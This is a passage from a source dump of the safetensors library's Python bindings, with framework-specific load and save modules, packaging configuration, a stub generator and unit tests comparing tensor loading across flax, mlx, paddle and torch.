content of a safetensors file 87 | 88 | Returns: 89 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu 90 | 91 | Example: 92 | 93 | ```python 94 | from safetensors.numpy import load 95 | 96 | file_path = "./my_folder/bert.safetensors" 97 | with open(file_path, "rb") as f: 98 | data = f.read() 99 | 100 | loaded = load(data) 101 | ``` 102 | """ 103 | flat = deserialize(data) 104 | return _view2np(flat) 105 | 106 | 107 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]: 108 | """ 109 | Loads a safetensors file into numpy format. 
110 | 111 | Args: 112 | filename (`str`, or `os.PathLike`)): 113 | The name of the file which contains the tensors 114 | 115 | Returns: 116 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` 117 | 118 | Example: 119 | 120 | ```python 121 | from safetensors.numpy import load_file 122 | 123 | file_path = "./my_folder/bert.safetensors" 124 | loaded = load_file(file_path) 125 | ``` 126 | """ 127 | result = {} 128 | with safe_open(filename, framework="np") as f: 129 | for k in f.offset_keys(): 130 | result[k] = f.get_tensor(k) 131 | return result 132 | 133 | 134 | _TYPES = { 135 | "F64": np.float64, 136 | "F32": np.float32, 137 | "F16": np.float16, 138 | "I64": np.int64, 139 | "U64": np.uint64, 140 | "I32": np.int32, 141 | "U32": np.uint32, 142 | "I16": np.int16, 143 | "U16": np.uint16, 144 | "I8": np.int8, 145 | "U8": np.uint8, 146 | "BOOL": bool, 147 | } 148 | 149 | 150 | def _getdtype(dtype_str: str) -> np.dtype: 151 | return _TYPES[dtype_str] 152 | 153 | 154 | def _view2np(safeview) -> Dict[str, np.ndarray]: 155 | result = {} 156 | for k, v in safeview: 157 | dtype = _getdtype(v["dtype"]) 158 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) 159 | result[k] = arr 160 | return result 161 | 162 | 163 | def _is_little_endian(tensor: np.ndarray) -> bool: 164 | byteorder = tensor.dtype.byteorder 165 | if byteorder == "=": 166 | if sys.byteorder == "little": 167 | return True 168 | else: 169 | return False 170 | elif byteorder == "|": 171 | return True 172 | elif byteorder == "<": 173 | return True 174 | elif byteorder == ">": 175 | return False 176 | raise ValueError(f"Unexpected byte order {byteorder}") 177 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import paddle 7 | from safetensors import numpy 8 | 9 | 10 | def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: 11 | """ 12 | Saves a dictionary of tensors into raw bytes in safetensors format. 13 | 14 | Args: 15 | tensors (`Dict[str, paddle.Tensor]`): 16 | The incoming tensors. Tensors need to be contiguous and dense. 17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 18 | Optional text only metadata you might want to save in your header. 19 | For instance it can be useful to specify more about the underlying 20 | tensors. This is purely informative and does not affect tensor loading. 21 | 22 | Returns: 23 | `bytes`: The raw bytes representing the format 24 | 25 | Example: 26 | 27 | ```python 28 | from safetensors.paddle import save 29 | import paddle 30 | 31 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 32 | byte_data = save(tensors) 33 | ``` 34 | """ 35 | np_tensors = _paddle2np(tensors) 36 | return numpy.save(np_tensors, metadata=metadata) 37 | 38 | 39 | def save_file( 40 | tensors: Dict[str, paddle.Tensor], 41 | filename: Union[str, os.PathLike], 42 | metadata: Optional[Dict[str, str]] = None, 43 | ) -> None: 44 | """ 45 | Saves a dictionary of tensors into raw bytes in safetensors format. 46 | 47 | Args: 48 | tensors (`Dict[str, paddle.Tensor]`): 49 | The incoming tensors. Tensors need to be contiguous and dense. 50 | filename (`str`, or `os.PathLike`)): 51 | The filename we're saving into. 
52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 53 | Optional text only metadata you might want to save in your header. 54 | For instance it can be useful to specify more about the underlying 55 | tensors. This is purely informative and does not affect tensor loading. 56 | 57 | Returns: 58 | `None` 59 | 60 | Example: 61 | 62 | ```python 63 | from safetensors.paddle import save_file 64 | import paddle 65 | 66 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 67 | save_file(tensors, "model.safetensors") 68 | ``` 69 | """ 70 | np_tensors = _paddle2np(tensors) 71 | return numpy.save_file(np_tensors, filename, metadata=metadata) 72 | 73 | 74 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]: 75 | """ 76 | Loads a safetensors file into paddle format from pure bytes. 77 | 78 | Args: 79 | data (`bytes`): 80 | The content of a safetensors file 81 | 82 | Returns: 83 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu 84 | 85 | Example: 86 | 87 | ```python 88 | from safetensors.paddle import load 89 | 90 | file_path = "./my_folder/bert.safetensors" 91 | with open(file_path, "rb") as f: 92 | data = f.read() 93 | 94 | loaded = load(data) 95 | ``` 96 | """ 97 | flat = numpy.load(data) 98 | return _np2paddle(flat, device) 99 | 100 | 101 | def load_file(filename: Union[str, os.PathLike], device="cpu") -> Dict[str, paddle.Tensor]: 102 | """ 103 | Loads a safetensors file into paddle format. 104 | 105 | Args: 106 | filename (`str`, or `os.PathLike`)): 107 | The name of the file which contains the tensors 108 | device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`): 109 | The device where the tensors need to be located after load. 
110 | available options are all regular paddle device locations 111 | 112 | Returns: 113 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` 114 | 115 | Example: 116 | 117 | ```python 118 | from safetensors.paddle import load_file 119 | 120 | file_path = "./my_folder/bert.safetensors" 121 | loaded = load_file(file_path) 122 | ``` 123 | """ 124 | flat = numpy.load_file(filename) 125 | output = _np2paddle(flat, device) 126 | return output 127 | 128 | 129 | def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str = "cpu") -> Dict[str, paddle.Tensor]: 130 | for k, v in numpy_dict.items(): 131 | numpy_dict[k] = paddle.to_tensor(v, place=device) 132 | return numpy_dict 133 | 134 | 135 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]: 136 | for k, v in paddle_dict.items(): 137 | paddle_dict[k] = v.detach().cpu().numpy() 138 | return paddle_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/py.typed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/py_src/safetensors/py.typed -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/tensorflow.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: 11 | """ 12 | Saves a dictionary of tensors into raw bytes in safetensors format. 13 | 14 | Args: 15 | tensors (`Dict[str, tf.Tensor]`): 16 | The incoming tensors. Tensors need to be contiguous and dense. 17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 18 | Optional text only metadata you might want to save in your header. 19 | For instance it can be useful to specify more about the underlying 20 | tensors. This is purely informative and does not affect tensor loading. 21 | 22 | Returns: 23 | `bytes`: The raw bytes representing the format 24 | 25 | Example: 26 | 27 | ```python 28 | from safetensors.tensorflow import save 29 | import tensorflow as tf 30 | 31 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 32 | byte_data = save(tensors) 33 | ``` 34 | """ 35 | np_tensors = _tf2np(tensors) 36 | return numpy.save(np_tensors, metadata=metadata) 37 | 38 | 39 | def save_file( 40 | tensors: Dict[str, tf.Tensor], 41 | filename: Union[str, os.PathLike], 42 | metadata: Optional[Dict[str, str]] = None, 43 | ) -> None: 44 | """ 45 | Saves a dictionary of tensors into raw bytes in safetensors format. 46 | 47 | Args: 48 | tensors (`Dict[str, tf.Tensor]`): 49 | The incoming tensors. Tensors need to be contiguous and dense. 50 | filename (`str`, or `os.PathLike`)): 51 | The filename we're saving into. 52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 53 | Optional text only metadata you might want to save in your header. 54 | For instance it can be useful to specify more about the underlying 55 | tensors. This is purely informative and does not affect tensor loading. 
56 | 57 | Returns: 58 | `None` 59 | 60 | Example: 61 | 62 | ```python 63 | from safetensors.tensorflow import save_file 64 | import tensorflow as tf 65 | 66 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 67 | save_file(tensors, "model.safetensors") 68 | ``` 69 | """ 70 | np_tensors = _tf2np(tensors) 71 | return numpy.save_file(np_tensors, filename, metadata=metadata) 72 | 73 | 74 | def load(data: bytes) -> Dict[str, tf.Tensor]: 75 | """ 76 | Loads a safetensors file into tensorflow format from pure bytes. 77 | 78 | Args: 79 | data (`bytes`): 80 | The content of a safetensors file 81 | 82 | Returns: 83 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu 84 | 85 | Example: 86 | 87 | ```python 88 | from safetensors.tensorflow import load 89 | 90 | file_path = "./my_folder/bert.safetensors" 91 | with open(file_path, "rb") as f: 92 | data = f.read() 93 | 94 | loaded = load(data) 95 | ``` 96 | """ 97 | flat = numpy.load(data) 98 | return _np2tf(flat) 99 | 100 | 101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]: 102 | """ 103 | Loads a safetensors file into tensorflow format. 104 | 105 | Args: 106 | filename (`str`, or `os.PathLike`)): 107 | The name of the file which contains the tensors 108 | 109 | Returns: 110 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` 111 | 112 | Example: 113 | 114 | ```python 115 | from safetensors.tensorflow import load_file 116 | 117 | file_path = "./my_folder/bert.safetensors" 118 | loaded = load_file(file_path) 119 | ``` 120 | """ 121 | result = {} 122 | with safe_open(filename, framework="tf") as f: 123 | for k in f.offset_keys(): 124 | result[k] = f.get_tensor(k) 125 | return result 126 | 127 | 128 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]: 129 | for k, v in numpy_dict.items(): 130 | numpy_dict[k] = tf.convert_to_tensor(v) 131 | return numpy_dict 132 | 133 | 134 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]: 135 | for k, v in tf_dict.items(): 136 | tf_dict[k] = v.numpy() 137 | return tf_dict 138 | -------------------------------------------------------------------------------- /bindings/python/pyproject.toml: -------------------------------------------------------------------------------- 1 | [project] 2 | name = 'safetensors' 3 | requires-python = '>=3.9' 4 | authors = [ 5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'} 6 | ] 7 | classifiers = [ 8 | "Development Status :: 5 - Production/Stable", 9 | "Intended Audience :: Developers", 10 | "Intended Audience :: Education", 11 | "Intended Audience :: Science/Research", 12 | "License :: OSI Approved :: Apache Software License", 13 | "Operating System :: OS Independent", 14 | "Programming Language :: Python :: 3", 15 | "Programming Language :: Python :: 3.7", 16 | "Programming Language :: Python :: 3.8", 17 | "Programming Language :: Python :: 3.9", 18 | "Programming Language :: Python :: 3.10", 19 | "Topic :: Scientific/Engineering :: Artificial Intelligence", 20 | "Typing :: Typed", 21 | ] 22 | license = { file = "LICENSE" } 23 | dynamic = [ 24 | 'description', 25 | 'readme', 26 | 'version', 27 | ] 28 | 29 | [project.urls] 30 | Homepage = 'https://github.com/huggingface/safetensors' 31 | Source = 'https://github.com/huggingface/safetensors' 32 | 33 | [project.optional-dependencies] 34 | numpy = ["numpy>=1.21.6"] 35 | torch = [ 36 | "safetensors[numpy]", 37 | "torch>=1.10", 38 | ] 39 | tensorflow = [ 40 | 
"safetensors[numpy]", 41 | "tensorflow>=2.11.0", 42 | ] 43 | # pinning tf version 2.11.0 for doc-builder 44 | pinned-tf = [ 45 | "safetensors[numpy]", 46 | "tensorflow==2.18.0", 47 | ] 48 | jax = [ 49 | "safetensors[numpy]", 50 | "flax>=0.6.3", 51 | "jax>=0.3.25", 52 | "jaxlib>=0.3.25", 53 | ] 54 | mlx = [ 55 | "mlx>=0.0.9", 56 | ] 57 | paddlepaddle = [ 58 | "safetensors[numpy]", 59 | "paddlepaddle>=2.4.1", 60 | ] 61 | quality = [ 62 | "black==22.3", # after updating to black 2023, also update Python version in pyproject.toml to 3.7 63 | "click==8.0.4", 64 | "isort>=5.5.4", 65 | "flake8>=3.8.3", 66 | ] 67 | testing = [ 68 | "safetensors[numpy]", 69 | "h5py>=3.7.0", 70 | "huggingface_hub>=0.12.1", 71 | "setuptools_rust>=1.5.2", 72 | "pytest>=7.2.0", 73 | "pytest-benchmark>=4.0.0", 74 | # "python-afl>=0.7.3", 75 | "hypothesis>=6.70.2", 76 | ] 77 | all = [ 78 | "safetensors[torch]", 79 | "safetensors[numpy]", 80 | "safetensors[pinned-tf]", 81 | "safetensors[jax]", 82 | "safetensors[paddlepaddle]", 83 | "safetensors[quality]", 84 | "safetensors[testing]", 85 | ] 86 | dev = [ 87 | "safetensors[all]", 88 | ] 89 | 90 | 91 | [build-system] 92 | requires = ["maturin>=1.0,<2.0"] 93 | build-backend = "maturin" 94 | 95 | [tool.maturin] 96 | python-source = "py_src" 97 | module-name = "safetensors._safetensors_rust" 98 | bindings = 'pyo3' 99 | features = ["pyo3/extension-module"] 100 | 101 | [tool.black] 102 | line-length = 119 103 | target-version = ['py35'] 104 | 105 | [tool.setuptools.dynamic] 106 | readme = {file = ["README.rst"]} 107 | -------------------------------------------------------------------------------- /bindings/python/setup.cfg: -------------------------------------------------------------------------------- 1 | [isort] 2 | default_section = FIRSTPARTY 3 | ensure_newline_before_comments = True 4 | force_grid_wrap = 0 5 | include_trailing_comma = True 6 | known_first_party = transformers 7 | known_third_party = 8 | absl 9 | conllu 10 | datasets 11 | elasticsearch 12 | fairseq 13 | faiss-cpu 14 | fastprogress 15 | fire 16 | fugashi 17 | git 18 | h5py 19 | matplotlib 20 | nltk 21 | numpy 22 | packaging 23 | pandas 24 | PIL 25 | psutil 26 | pytest 27 | pytorch_lightning 28 | rouge_score 29 | sacrebleu 30 | seqeval 31 | sklearn 32 | streamlit 33 | tensorboardX 34 | tensorflow 35 | tensorflow_datasets 36 | timeout_decorator 37 | torch 38 | torchaudio 39 | torchtext 40 | torchvision 41 | torch_xla 42 | tqdm 43 | paddlepaddle 44 | 45 | line_length = 119 46 | lines_after_imports = 2 47 | multi_line_output = 3 48 | use_parentheses = True 49 | 50 | [flake8] 51 | ignore = E203, E501, E741, W503, W605 52 | max-line-length = 119 53 | 54 | [tool:pytest] 55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS -------------------------------------------------------------------------------- /bindings/python/stub.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import inspect 3 | import os 4 | 5 | import black 6 | 7 | 8 | INDENT = " " * 4 9 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n" 10 | 11 | 12 | def do_indent(text: str, indent: str): 13 | return text.replace("\n", f"\n{indent}") 14 | 15 | 16 | def function(obj, indent, text_signature=None): 17 | if text_signature is None: 18 | text_signature = obj.__text_signature__ 19 | string = "" 20 | string += f"{indent}def {obj.__name__}{text_signature}:\n" 21 | indent += INDENT 22 | string += f'{indent}"""\n' 23 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n" 24 | string 
+= f'{indent}"""\n' 25 | string += f"{indent}pass\n" 26 | string += "\n" 27 | string += "\n" 28 | return string 29 | 30 | 31 | def member_sort(member): 32 | if inspect.isclass(member): 33 | value = 10 + len(inspect.getmro(member)) 34 | else: 35 | value = 1 36 | return value 37 | 38 | 39 | def fn_predicate(obj): 40 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj) 41 | if value: 42 | return ( 43 | obj.__doc__ 44 | and obj.__text_signature__ 45 | and (not obj.__name__.startswith("_") or obj.__name__ in {"__enter__", "__exit__"}) 46 | ) 47 | if inspect.isgetsetdescriptor(obj): 48 | return obj.__doc__ and not obj.__name__.startswith("_") 49 | return False 50 | 51 | 52 | def get_module_members(module): 53 | members = [ 54 | member 55 | for name, member in inspect.getmembers(module) 56 | if not name.startswith("_") and not inspect.ismodule(member) 57 | ] 58 | members.sort(key=member_sort) 59 | return members 60 | 61 | 62 | def pyi_file(obj, indent=""): 63 | string = "" 64 | if inspect.ismodule(obj): 65 | string += GENERATED_COMMENT 66 | members = get_module_members(obj) 67 | for member in members: 68 | string += pyi_file(member, indent) 69 | 70 | elif inspect.isclass(obj): 71 | indent += INDENT 72 | mro = inspect.getmro(obj) 73 | if len(mro) > 2: 74 | inherit = f"({mro[1].__name__})" 75 | else: 76 | inherit = "" 77 | string += f"class {obj.__name__}{inherit}:\n" 78 | 79 | body = "" 80 | if obj.__doc__: 81 | body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n' 82 | 83 | fns = inspect.getmembers(obj, fn_predicate) 84 | 85 | # Init 86 | if obj.__text_signature__: 87 | signature = obj.__text_signature__.replace("(", "(self, ") 88 | body += f"{indent}def __init__{signature}:\n" 89 | body += f"{indent+INDENT}pass\n" 90 | body += "\n" 91 | 92 | for name, fn in fns: 93 | body += pyi_file(fn, indent=indent) 94 | 95 | if not body: 96 | body += f"{indent}pass\n" 97 | 98 | string += body 99 | string += "\n\n" 100 | 101 | elif inspect.isbuiltin(obj): 102 | string += f"{indent}@staticmethod\n" 103 | string += function(obj, indent) 104 | 105 | elif inspect.ismethoddescriptor(obj): 106 | string += function(obj, indent) 107 | 108 | elif inspect.isgetsetdescriptor(obj): 109 | # TODO it would be interesing to add the setter maybe ? 110 | string += f"{indent}@property\n" 111 | string += function(obj, indent, text_signature="(self)") 112 | else: 113 | raise Exception(f"Object {obj} is not supported") 114 | return string 115 | 116 | 117 | def py_file(module, origin): 118 | members = get_module_members(module) 119 | 120 | string = GENERATED_COMMENT 121 | string += f"from .. 
import {origin}\n" 122 | string += "\n" 123 | for member in members: 124 | name = member.__name__ 125 | string += f"{name} = {origin}.{name}\n" 126 | return string 127 | 128 | 129 | def do_black(content, is_pyi): 130 | mode = black.Mode( 131 | target_versions={black.TargetVersion.PY35}, 132 | line_length=119, 133 | is_pyi=is_pyi, 134 | string_normalization=True, 135 | experimental_string_processing=False, 136 | ) 137 | try: 138 | content = content.replace("$self", "self") 139 | return black.format_file_contents(content, fast=True, mode=mode) 140 | except black.NothingChanged: 141 | return content 142 | 143 | 144 | def write(module, directory, origin, check=False): 145 | submodules = [(name, member) for name, member in inspect.getmembers(module) if inspect.ismodule(member)] 146 | 147 | filename = os.path.join(directory, "__init__.pyi") 148 | pyi_content = pyi_file(module) 149 | pyi_content = do_black(pyi_content, is_pyi=True) 150 | os.makedirs(directory, exist_ok=True) 151 | if check: 152 | with open(filename, "r") as f: 153 | data = f.read() 154 | assert data == pyi_content, f"The content of {filename} seems outdated, please run `python stub.py`" 155 | else: 156 | with open(filename, "w") as f: 157 | f.write(pyi_content) 158 | 159 | filename = os.path.join(directory, "__init__.py") 160 | py_content = py_file(module, origin) 161 | py_content = do_black(py_content, is_pyi=False) 162 | os.makedirs(directory, exist_ok=True) 163 | 164 | is_auto = False 165 | if not os.path.exists(filename): 166 | is_auto = True 167 | else: 168 | with open(filename, "r") as f: 169 | line = f.readline() 170 | if line == GENERATED_COMMENT: 171 | is_auto = True 172 | 173 | if is_auto: 174 | if check: 175 | with open(filename, "r") as f: 176 | data = f.read() 177 | assert data == py_content, f"The content of {filename} seems outdated, please run `python stub.py`" 178 | else: 179 | with open(filename, "w") as f: 180 | f.write(py_content) 181 | 182 | for name, submodule in submodules: 183 | write(submodule, os.path.join(directory, name), f"{name}", check=check) 184 | 185 | 186 | if __name__ == "__main__": 187 | parser = argparse.ArgumentParser() 188 | parser.add_argument("--check", action="store_true") 189 | 190 | args = parser.parse_args() 191 | import safetensors 192 | 193 | write( 194 | safetensors._safetensors_rust, 195 | "py_src/safetensors/", 196 | "safetensors", 197 | check=args.check, 198 | ) 199 | -------------------------------------------------------------------------------- /bindings/python/tests/data/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/tests/data/__init__.py -------------------------------------------------------------------------------- /bindings/python/tests/test_flax_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | import sys 4 | 5 | 6 | if platform.system() != "Windows": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 
9 |     import jax.numpy as jnp
10 |     from jax import random
11 |     from flax.serialization import msgpack_restore, msgpack_serialize
12 |     from safetensors import safe_open
13 |     from safetensors.flax import load_file, save_file
14 | 
15 | 
16 | # Jax does not exist on Windows
17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows")
18 | class LoadTestCase(unittest.TestCase):
19 |     def setUp(self):
20 |         key = random.key(0)
21 |         data = {
22 |             "test": random.normal(key, (1024, 1024), dtype=jnp.float32),
23 |             "test2": random.normal(key, (1024, 1024), dtype=jnp.float16),
24 |             "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16),
25 |         }
26 |         self.flax_filename = "./tests/data/flax_load.msgpack"
27 |         self.sf_filename = "./tests/data/flax_load.safetensors"
28 | 
29 |         serialized = msgpack_serialize(data)
30 |         with open(self.flax_filename, "wb") as f:
31 |             f.write(serialized)
32 | 
33 |         save_file(data, self.sf_filename)
34 | 
35 |     def test_zero_sized(self):
36 |         data = {
37 |             "test": jnp.zeros((2, 0), dtype=jnp.float32),
38 |         }
39 |         local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
40 |         save_file(data.copy(), local)
41 |         reloaded = load_file(local)
42 |         # Empty tensor != empty tensor on numpy, so comparing shapes
43 |         # instead
44 |         self.assertEqual(data["test"].shape, reloaded["test"].shape)
45 | 
46 |     def test_deserialization_safe(self):
47 |         weights = load_file(self.sf_filename)
48 | 
49 |         with open(self.flax_filename, "rb") as f:
50 |             data = f.read()
51 |         flax_weights = msgpack_restore(data)
52 | 
53 |         for k, v in weights.items():
54 |             tv = flax_weights[k]
55 |             self.assertTrue(jnp.allclose(v, tv))
56 | 
57 |     def test_deserialization_safe_open(self):
58 |         weights = {}
59 |         with safe_open(self.sf_filename, framework="flax") as f:
60 |             for k in f.keys():
61 |                 weights[k] = f.get_tensor(k)
62 | 
63 |         with open(self.flax_filename, "rb") as f:
64 |             data = f.read()
65 |         flax_weights = msgpack_restore(data)
66 | 
67 |         for k, v in weights.items():
68 |             tv = flax_weights[k]
69 |             self.assertTrue(jnp.allclose(v, tv))
70 | 
71 |     def test_loading_without_ml_dtype(self):
72 |         # This cannot be tested reliably here since we cannot unload
73 |         # modules; copy this into its own file to test it in isolation.
74 |         # https://github.com/huggingface/safetensors/issues/598
75 |         sys.modules.pop("ml_dtypes", None)
76 |         with safe_open(self.sf_filename, framework="flax") as f:
77 |             f.get_tensor("test3")
78 | 
--------------------------------------------------------------------------------
/bindings/python/tests/test_mlx_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 | 
4 | 
5 | HAS_MLX = False
6 | if platform.system() == "Darwin":
7 |     # Other platforms are not supported and we don't want to crash on import.
8 |     # The tests below will be skipped there anyway.
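9 |     # Even on macOS, mlx is an optional extra, so guard the import and record
10 |     # availability instead of failing at test collection time.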
11 |     try:
12 |         import mlx.core as mx
13 | 
14 |         HAS_MLX = True
15 |     except ImportError:
16 |         pass
17 | if HAS_MLX:
18 |     from safetensors import safe_open
19 |     from safetensors.mlx import load_file, save_file
20 | 
21 | 
22 | # MLX only exists on Mac
23 | @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non-Mac platforms")
24 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.")
25 | class LoadTestCase(unittest.TestCase):
26 |     def setUp(self):
27 |         data = {
28 |             "test": mx.random.normal((1024, 1024), dtype=mx.float32),
29 |             "test2": mx.random.normal((1024, 1024), dtype=mx.float32),
30 |             "test3": mx.random.normal((1024, 1024), dtype=mx.float32),
31 |             # This doesn't work because bfloat16 is not implemented
32 |             # with similar workarounds as jax/tensorflow.
33 |             # https://github.com/ml-explore/mlx/issues/1296
34 |             # "test4": mx.random.normal((1024, 1024), dtype=mx.bfloat16),
35 |         }
36 |         self.mlx_filename = "./tests/data/mlx_load.npz"
37 |         self.sf_filename = "./tests/data/mlx_load.safetensors"
38 | 
39 |         mx.savez(self.mlx_filename, **data)
40 |         save_file(data, self.sf_filename)
41 | 
42 |     def test_zero_sized(self):
43 |         data = {
44 |             "test": mx.zeros((2, 0), dtype=mx.float32),
45 |         }
46 |         local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
47 |         save_file(data.copy(), local)
48 |         reloaded = load_file(local)
49 |         # Empty tensor != empty tensor on numpy, so comparing shapes
50 |         # instead
51 |         self.assertEqual(data["test"].shape, reloaded["test"].shape)
52 | 
53 |     def test_deserialization_safe(self):
54 |         weights = load_file(self.sf_filename)
55 | 
56 |         mlx_weights = mx.load(self.mlx_filename)
57 | 
58 |         for k, v in weights.items():
59 |             tv = mlx_weights[k]
60 |             self.assertTrue(mx.allclose(v, tv))
61 | 
62 |     def test_deserialization_safe_open(self):
63 |         weights = {}
64 |         with safe_open(self.sf_filename, framework="mlx") as f:
65 |             for k in f.keys():
66 |                 weights[k] = f.get_tensor(k)
67 | 
68 |         mlx_weights = mx.load(self.mlx_filename)
69 | 
70 |         for k, v in weights.items():
71 |             tv = mlx_weights[k]
72 |             self.assertTrue(mx.allclose(v, tv))
73 | 
--------------------------------------------------------------------------------
/bindings/python/tests/test_paddle_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | 
3 | import numpy as np
4 | 
5 | 
6 | try:
7 |     import paddle
8 |     from safetensors.paddle import load_file, save_file
9 | 
10 |     HAS_PADDLE = True
11 | except ImportError:
12 |     HAS_PADDLE = False
13 | 
14 | 
15 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
16 | class SafeTestCase(unittest.TestCase):
17 |     def setUp(self):
18 |         data = {
19 |             "test": paddle.zeros((1024, 1024), dtype=paddle.float32),
20 |             "test2": paddle.zeros((1024, 1024), dtype=paddle.float32),
21 |             "test3": paddle.zeros((1024, 1024), dtype=paddle.float32),
22 |         }
23 |         self.paddle_filename = "./tests/data/paddle_load.pdparams"
24 |         self.sf_filename = "./tests/data/paddle_load.safetensors"
25 | 
26 |         paddle.save(data, self.paddle_filename)
27 |         save_file(data, self.sf_filename)
28 | 
29 |     @unittest.expectedFailure
30 |     def test_zero_sized(self):
31 |         # This fails because paddle wants an initialized tensor before
32 |         # sending it to numpy
33 |         data = {
34 |             "test": paddle.zeros((2, 0), dtype=paddle.float32),
35 |         }
36 |         local = "./tests/data/out_safe_paddle_mmap_small2.safetensors"
37 |         save_file(data, local)
38 |         reloaded = load_file(local)
39 |         self.assertTrue(paddle.equal(data["test"], reloaded["test"]))
40 | 
41 |     def test_deserialization_safe(self):
42 |         weights = 
load_file(self.sf_filename) 43 | 44 | paddle_weights = paddle.load(self.paddle_filename) 45 | for k, v in weights.items(): 46 | tv = paddle_weights[k] 47 | self.assertTrue(np.allclose(v, tv)) 48 | -------------------------------------------------------------------------------- /bindings/python/tests/test_pt_model.py: -------------------------------------------------------------------------------- 1 | import copy 2 | import unittest 3 | 4 | import torch 5 | 6 | from safetensors import safe_open 7 | from safetensors.torch import ( 8 | _end_ptr, 9 | _find_shared_tensors, 10 | _is_complete, 11 | _remove_duplicate_names, 12 | load_model, 13 | save_file, 14 | save_model, 15 | ) 16 | 17 | 18 | class OnesModel(torch.nn.Module): 19 | def __init__(self): 20 | super().__init__() 21 | self.a = torch.nn.Linear(4, 4) 22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4))) 23 | self.a.bias = torch.nn.Parameter(torch.ones((4,))) 24 | self.b = self.a 25 | 26 | 27 | class Model(torch.nn.Module): 28 | def __init__(self): 29 | super().__init__() 30 | self.a = torch.nn.Linear(100, 100) 31 | self.b = self.a 32 | 33 | 34 | class NonContiguousModel(torch.nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = torch.nn.Linear(100, 100) 38 | A = torch.zeros((100, 100)) 39 | A = A.transpose(0, 1) 40 | self.a.weight = torch.nn.Parameter(A) 41 | 42 | 43 | class CopyModel(torch.nn.Module): 44 | def __init__(self): 45 | super().__init__() 46 | self.a = torch.nn.Linear(100, 100) 47 | self.b = copy.deepcopy(self.a) 48 | 49 | 50 | class NoSharedModel(torch.nn.Module): 51 | def __init__(self): 52 | super().__init__() 53 | self.a = torch.nn.Linear(100, 100) 54 | self.b = torch.nn.Linear(100, 100) 55 | 56 | 57 | class TorchModelTestCase(unittest.TestCase): 58 | def test_is_complete(self): 59 | A = torch.zeros((3, 3)) 60 | self.assertTrue(_is_complete(A)) 61 | 62 | B = A[:1, :] 63 | self.assertFalse(_is_complete(B)) 64 | 65 | # Covers the whole storage but with holes 66 | C = A[::2, :] 67 | self.assertFalse(_is_complete(C)) 68 | 69 | D = torch.zeros((2, 2), device=torch.device("meta")) 70 | self.assertTrue(_is_complete(D)) 71 | 72 | def test_find_shared_tensors(self): 73 | A = torch.zeros((3, 3)) 74 | B = A[:1, :] 75 | 76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}]) 77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}]) 78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}]) 79 | 80 | C = torch.zeros((2, 2), device=torch.device("meta")) 81 | D = C[:1] 82 | # Meta device is not shared 83 | 